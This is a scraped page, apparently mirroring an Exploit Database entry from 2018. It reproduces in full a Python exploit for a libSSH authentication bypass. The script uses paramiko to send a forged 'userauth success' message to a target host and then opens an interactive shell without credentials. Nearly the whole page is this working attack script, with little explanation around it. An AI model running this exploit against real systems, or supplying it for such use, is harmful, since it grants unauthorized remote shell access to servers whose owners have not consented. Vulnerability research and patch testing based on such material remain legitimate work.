libSSH – Authentication Bypass

• Exploit Database
• 18 阅读

• 作者： Dayanç Soyadlı
  日期： 2018-10-18
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/45638/

• #!/usr/bin/env python3
  import paramiko
  import socket
  import argparse
  from sys import argv, exit
  
  
  parser = argparse.ArgumentParser(description="libSSH Authentication Bypass")
  parser.add_argument('--host', help='Host')
  parser.add_argument('-p', '--port', help='libSSH port', default=22)
  parser.add_argument('-log', '--logfile', help='Logfile to write conn logs', default="paramiko.log")
  
  args = parser.parse_args()
  
  
  def BypasslibSSHwithoutcredentials(hostname, port):
  
  sock = socket.socket()
  try:
  sock.connect((str(hostname), int(port)))
  
  message = paramiko.message.Message()
  transport = paramiko.transport.Transport(sock)
  transport.start_client()
  
  message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
  transport._send_message(message)
  
  spawncmd = transport.open_session()
  spawncmd.invoke_shell()
  return 0
  
  except paramiko.SSHException as e:
  print("TCPForwarding disabled on remote/local server can't connect. Not Vulnerable")
  return 1
  except socket.error:
  print("Unable to connect.")
  return 1
  
  
  def main():
  paramiko.util.log_to_file(args.logfile)
  try:
  hostname = args.host
  port = args.port
  except:
  parser.print_help()
  exit(1)
  BypasslibSSHwithoutcredentials(hostname, port)
  
  if __name__ == '__main__':
  exit(main())